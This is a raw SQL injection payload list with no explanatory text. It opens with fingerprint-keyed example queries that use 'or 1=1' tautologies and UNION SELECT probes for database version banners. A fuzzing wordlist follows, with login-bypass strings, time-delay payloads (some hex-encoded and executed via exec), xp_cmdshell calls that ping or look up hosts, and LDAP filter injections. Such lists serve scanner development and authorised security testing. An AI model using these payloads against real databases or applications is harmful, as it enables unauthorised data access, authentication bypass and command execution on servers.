s.n: select * from users where id=1 or ".[" or 1=1 -- 1
s.ns: select * from users where id=1 or "._" or 1=1 -- 1
s.o1&: select * from users where id=1 or @#".=1 or 1=1 -- 1
s.o1U: select * from users where id=1 or 1#".=1 union select 1,version() -- 1
s.os: select * from users where id=1 or ".%" or 1=1 -- 1
s.v: select * from users where id=1 or ".@" or 1=1 -- 1
s.{s: select * from users where id=1 or ".{" or 1=1 -- 1
s1(s: select * from users where id=1 or "1("=1 or 1=1 -- 1
s1)s: select * from users where id=1 or "1)" or 1=1 -- 1
s1: select * from users where id=1 or "1," or 1=1 -- 1
s1:s: select * from users where id=1 or "1:" or 1=1 -- 1
s1;s: select * from users where id=1 or "1;"=1 or 1=1 -- 1
s1?s: select * from users where id=1 or "1]" or 1=1 -- 1
s1UE1: select * from users where id=1 or 1#"1 union select 1,version() -- 1
s1UEf: select * from users where id=1 or 1#"1 union select version(),version() -- 1
s1UEs: select * from users where id=1 or 1#"1 union select 'a',version() -- 1
s1UEv: select * from users where id=1 or 1#"1 union select null,version() -- 1
s1c: select * from users where id=1 or "1#" or 1=1 -- 1
s1n: select * from users where id=1 or "1[" or 1=1 -- 1
s1ns: select * from users where id=1 or "1_" or 1=1 -- 1
s1os: select * from users where id=1 or "1&" or 1=1 -- 1
s1{s: select * from users where id=1 or "1{" or 1=1 -- 1
s: select * from users where id='1' or ""<@ union select 1,version() -- 1'
s:&1c: select * from users where id=1 or 1#": or 1=1 -- 1
s:(s: select * from users where id=1 or ":("=1 or 1=1 -- 1
s:)s: select * from users where id=1 or ":)"=1 or 1=1 -- 1
s:,s: select * from users where id=1 or ":," or 1=1 -- 1
s:.s: select * from users where id=1 or ":."=1 or 1=1 -- 1
s:1s: select * from users where id=1 or ":1" or 1=1 -- 1
s:;s: select * from users where id=1 or ":;"=1 or 1=1 -- 1
s:?s: select * from users where id=1 or ":]" or 1=1 -- 1
s:UE1: select * from users where id=1 or 1#": union select 1,version() -- 1
s:UEf: select * from users where id=1 or 1#": union select version(),version() -- 1
s:UEs: select * from users where id=1 or 1#": union select 'a',version() -- 1
s:UEv: select * from users where id=1 or 1#": union select null,version() -- 1
s:c: select * from users where id=1 or ":#" or 1=1 -- 1
s:n: select * from users where id=1 or ":[" or 1=1 -- 1
s:ns: select * from users where id=1 or ":$" or 1=1 -- 1
s:os: select * from users where id=1 or ":%" or 1=1 -- 1
s:s: select * from users where id='1' union select ":"_,version() -- 1'
s:v: select * from users where id=1 or ":@" or 1=1 -- 1
s:{s: select * from users where id=1 or ":{" or 1=1 -- 1
s;&1c: select * from users where id=1 or 1#"; or 1=1 -- 1
s;(s: select * from users where id=1 or ";(" or 1=1 -- 1
s;)s: select * from users where id=1 or ";)"=1 or 1=1 -- 1
s;,s: select * from users where id=1 or ";,"=1 or 1=1 -- 1
s;.s: select * from users where id=1 or ";."=1 or 1=1 -- 1
s;1s: select * from users where id=1 or ";1" or 1=1 -- 1
s;:s: select * from users where id=1 or ";:"=1 or 1=1 -- 1
s;?s: select * from users where id=1 or ";]" or 1=1 -- 1
s;UE1: select * from users where id=1 or 1#"; union select 1,version() -- 1
s;UEf: select * from users where id=1 or 1#"; union select version(),version() -- 1
s;UEs: select * from users where id=1 or 1#"; union select 'a',version() -- 1
s;UEv: select * from users where id=1 or 1#"; union select null,version() -- 1
s;c: select * from users where id=1 or ";#" or 1=1 -- 1
s;n: select * from users where id=1 or ";[" or 1=1 -- 1
s;ns: select * from users where id=1 or ";_" or 1=1 -- 1
s;o1&: select * from users where id=1 or @#";=1 or 1=1 -- 1
s;o1U: select * from users where id=1 or 1#";=1 union select 1,version() -- 1
s;os: select * from users where id=1 or ";&" or 1=1 -- 1
s;s: select * from users where id='1' union select ";"_,version() -- 1'
s;v: select * from users where id=1 or ";@" or 1=1 -- 1
s;{s: select * from users where id=1 or ";{" or 1=1 -- 1
s?&1c: select * from users where id=1 or 1#"? or 1=1 -- 1
s?(s: select * from users where id=1 or "?(" or 1=1 -- 1
s?)s: select * from users where id=1 or "])" or 1=1 -- 1
s?,s: select * from users where id=1 or "?," or 1=1 -- 1
s?,vc: select * from users where id='1' union select $["],@@VERSION -- 1'
s?.s: select * from users where id=1 or "]." or 1=1 -- 1
s?1s: select * from users where id=1 or "]1" or 1=1 -- 1
s?:s: select * from users where id=1 or "]:" or 1=1 -- 1
s?;s: select * from users where id=1 or "?;" or 1=1 -- 1
s??s: select * from users where id=1 or "??" or 1=1 -- 1
s?UE1: select * from users where id=1 or 1#"? union select 1,version() -- 1
s?UEf: select * from users where id=1 or 1#"? union select version(),version() -- 1
s?UEs: select * from users where id=1 or 1#"? union select 'a',version() -- 1
s?UEv: select * from users where id=1 or 1#"? union select null,version() -- 1
s?c: select * from users where id=1 or "?#" or 1=1 -- 1
s?n: select * from users where id=1 or "?[" or 1=1 -- 1
s?ns: select * from users where id=1 or "?_" or 1=1 -- 1
s?o1&: select * from users where id=1 or 1#"?=1 or 1=1 -- 1
s?o1U: select * from users where id=1 or 1#"?=1 union select 1,version() -- 1
s?os: select * from users where id=1 or "?%" or 1=1 -- 1
s?s: select * from users where id='1' union select "?"_,version() -- 1'
s?v: select * from users where id=1 or "?@" or 1=1 -- 1
s?{s: select * from users where id=1 or "]{" or 1=1 -- 1
sUE&o: select * from users where id='1' union select ||/1,version() -- 1'
sUE(): select * from users where id='1' union select (\),@@VERSION -- 1'
sUE(.: select * from users where id='1' union select (\.),@@VERSION -- 1'
sUE(1: select * from users where id='1' union select (1),banner from v$version where rownum=1 -- 1'
sUE,v: select * from users where id='1' union select \,@@VERSION -- 1'
sUE.,: select * from users where id='1' union select \.,@@VERSION -- 1'
sUE.c: select * from users where id='1' union select \.#,@@VERSION -- 1'
sUE.o: select * from users where id='1' union select \.%1,@@VERSION -- 1'
sUE1k: select * from users where id='1' union select 1,banner from v$version where rownum=1 -- 1'
sUE1n: select * from users where id='1' union select 1a,banner from v$version where rownum=1 -- 1'
sUE1s: select * from users where id='1' union select 1"!",banner from v$version where rownum=1 -- 1'
sUE\c: select * from users where id='1' union select \#,@@VERSION -- 1'
sUEn.: select * from users where id='1' union select $ .,@@VERSION -- 1'
sUEnn: select * from users where id='1' union select $ _,@@VERSION -- 1'
sUEnv: select * from users where id='1' union select $*$,@@VERSION -- 1'
sUEo,: select * from users where id='1' union select +\,@@VERSION -- 1'
sUEo.: select * from users where id='1' union select +\.,@@VERSION -- 1'
sUEo1: select * from users where id='1' union select !<1,version() -- 1'
sUEo\: select * from users where id='1' union select +\#,@@VERSION -- 1'
sUEov: select * from users where id='1' union select !<@,version() -- 1'
sUEv1: select * from users where id='1' union select @ 1,version() --  1'
sUEvk: select * from users where id='1'   union select null,banner from v$version where rownum=1 -- 1'
sUEvv: select * from users where id='1' union select @ @1,version() --  1'
s\c: select * from users where id=1 or "\#" or 1=1 -- 1
sn(s: select * from users where id=1 or "$(" or 1=1 -- 1
sn)s: select * from users where id=1 or "_)" or 1=1 -- 1
sn: select * from users where id='1' union select "["_,version() -- 1'
sn:s: select * from users where id=1 or "$:" or 1=1 -- 1
sn;s: select * from users where id=1 or "_;" or 1=1 -- 1
sn?s: select * from users where id=1 or "$?" or 1=1 -- 1
snUE1: select * from users where id=1 or 1#"$ union select 1,version() -- 1
snUEf: select * from users where id=1 or 1#"$ union select version(),version() -- 1
snUEs: select * from users where id=1 or 1#"$ union select 'a',version() -- 1
snUEv: select * from users where id=1 or 1#"$ union select null,version() -- 1
snc: select * from users where id=1 or "$#" or 1=1 -- 1
snn: select * from users where id=1 or "$[" or 1=1 -- 1
snns: select * from users where id=1 or "$_" or 1=1 -- 1
snos: select * from users where id=1 or "$&" or 1=1 -- 1
snv: select * from users where id=1 or "$@" or 1=1 -- 1
sn{s: select * from users where id=1 or "_{" or 1=1 -- 1
so()&: select * from users where id='1' *(\) or 1=1 -- 1'
so()U: select * from users where id='1' + (\) union select 1,@@VERSION -- 1'
so(.): select * from users where id='1' + (\.) union select 1,@@VERSION -- 1'
so(1): select * from users where id='1' *(1) union select 1,banner from v$version where rownum=1 -- 1'
so(s: select * from users where id=1 or "&(" or 1=1 -- 1
so)s: select * from users where id=1 or "&)" or 1=1 -- 1
so,s: select * from users where id=1 or "%," or 1=1 -- 1
so..&: select * from users where id='1'<@.. or 1=1 -- 1'
so..U: select * from users where id='1'<@.. union select 1,version() -- 1'
so.n&: select * from users where id='1' <@.$ or 1=1 -- 1'
so.nU: select * from users where id='1' <@._ union select 1,version() -- 1'
so.s: select * from users where id=1 or "%." or 1=1 -- 1
so1&1: select * from users where id='1' + 1||1 union select 1,banner from v$version where rownum=1 -- 1'
so1UE: select * from users where id='1' *1 union select 1,banner from v$version where rownum=1 -- 1'
so1s: select * from users where id=1 or "%1" or 1=1 -- 1
so:s: select * from users where id=1 or "&:" or 1=1 -- 1
so;s: select * from users where id=1 or "%;" or 1=1 -- 1
so?s: select * from users where id=1 or "%?" or 1=1 -- 1
soc: select * from users where id='1' + @<@# union select 1,version() -- 1'
son.&: select * from users where id='1' *$ . or 1=1 -- 1'
son.U: select * from users where id='1' + $ . union select 1,@@VERSION -- 1'
son1&: select * from users where id='1' *$ 1 or 1=1 -- 1'
son: select * from users where id=1 or "%[" or 1=1 -- 1
sonn&: select * from users where id='1' <@$_ or 1=1 -- 1'
sonnU: select * from users where id='1' <@$_ union select 1,version() -- 1'
sons: select * from users where id=1 or "%_" or 1=1 -- 1
soo&1: select * from users where id='1' + $+%\ or 1=1 -- 1'
soo1&: select * from users where id='1' <@&1 or 1=1 -- 1'
soo1U: select * from users where id='1' <@&1 union select 1,version() -- 1'
sooUE: select * from users where id='1' <@<@ union select 1,version() -- 1'
soon&: select * from users where id='1' + $+%$ or 1=1 -- 1'
soonU: select * from users where id='1' + $+*$ union select 1,@@VERSION -- 1'
soos: select * from users where id=1 or "%&" or 1=1 -- 1
soov&: select * from users where id='1' <@&@ or 1=1 -- 1'
soovU: select * from users where id='1' %!<@ union select 1,version() -- 1'
sos: select * from users where id='1'<@$$ union select 1,version() -- 1'
sov(1: select * from users where id='1' + @(1) union select 1,version() -- 1'
sov1U: select * from users where id='1' + @ 1 union select 1,version() -- 1'
sov1o: select * from users where id='1' + @ 1! union select 1,version() -- 1'
sovvU: select * from users where id='1' + @ @1 union select 1,version() -- 1'
so{s: select * from users where id=1 or "%{" or 1=1 -- 1
sv(s: select * from users where id=1 or "@(" or 1=1 -- 1
sv)s: select * from users where id=1 or "@)" or 1=1 -- 1
sv:s: select * from users where id=1 or "@:"=1 or 1=1 -- 1
sv;s: select * from users where id=1 or "@;"=1 or 1=1 -- 1
sv?s: select * from users where id=1 or "@?" or 1=1 -- 1
svUE1: select * from users where id=1 or 1#"@ union select 1,version() -- 1
svUEf: select * from users where id=1 or 1#"@ union select version(),version() -- 1
svUEs: select * from users where id=1 or 1#"@ union select 'a',version() -- 1
svUEv: select * from users where id=1 or 1#"@ union select null,version() -- 1
svc: select * from users where id=1 or "@#" or 1=1 -- 1
svos: select * from users where id=1 or "@%" or 1=1 -- 1
s{(s: select * from users where id=1 or "{("=1 or 1=1 -- 1
s{)s: select * from users where id=1 or "{)" or 1=1 -- 1
s{,s: select * from users where id=1 or "{,"=1 or 1=1 -- 1
s{.s: select * from users where id=1 or "{." or 1=1 -- 1
s{1s: select * from users where id=1 or "{1"=1 or 1=1 -- 1
s{:s: select * from users where id=1 or "{:" or 1=1 -- 1
s{;s: select * from users where id=1 or "{;" or 1=1 -- 1
s{?s: select * from users where id=1 or "{?" or 1=1 -- 1
s{UE1: select * from users where id=1 or 1#"{ union select 1,version() -- 1
s{UEf: select * from users where id=1 or 1#"{ union select version(),version() -- 1
s{UEs: select * from users where id=1 or 1#"{ union select 'a',version() -- 1
s{UEv: select * from users where id=1 or 1#"{ union select null,version() -- 1
s{c: select * from users where id=1 or "{#" or 1=1 -- 1
s{o1&: select * from users where id=1 or @#"{=1 or 1=1 -- 1
s{o1U: select * from users where id=1 or @#"{=1 union select 1,version() -- 1
s{os: select * from users where id=1 or "{%" or 1=1 -- 1
s{v: select * from users where id=1 or "{@" or 1=1 -- 1
s{{s: select * from users where id=1 or "{{" or 1=1 -- 1
v: select * from users where id=1 + @`\` union select 1,version() -- 1
vc: select * from users where id=1 + @<1# union select 1,version() -- 1
vo.UE: select * from users where id=1 + @<@. union select 1,version() -- 1
voUE1: select * from users where id=1 -@<@ union select 1,version() -- 1
voUEf: select * from users where id=1 -@<@ union select version(),version() -- 1
voUEv: select * from users where id=1 -@<@ union select null,version() -- 1
voc: select * from users where id=1 + @<@# union select null,version() -- 1
Statement
'sqlvuln
'+sqlvuln
sqlvuln;
(sqlvuln)
a' or 1=1--
"a"" or 1=1--"
 or a = a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (4000) select @q =
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0
031003000270000
declare @s varchar(22) select @s =
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
exec(@s)
a'
?
' or 1=1
‘ or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
anything' OR 'x'='x
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND members.email IS NULL; --
x' OR full_name LIKE '%Bob%
23 OR 1=1
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'
'%20or%20''='
'%20or%20'x'='x
%20or%20x=x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
 or 0=0 #"
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
 or 1=1 or ""=
' or a=a--
 or a=a
') or ('a'='a
) or (a=a
hi or a=a
hi or 1=1 --"
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
"hi"") or (""a""=""a"
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
<>"'%;)(&+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
&apos;%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
a' or 3=3--
"a"" or 3=3--"
' or 3=3
‘ or 3=3 --
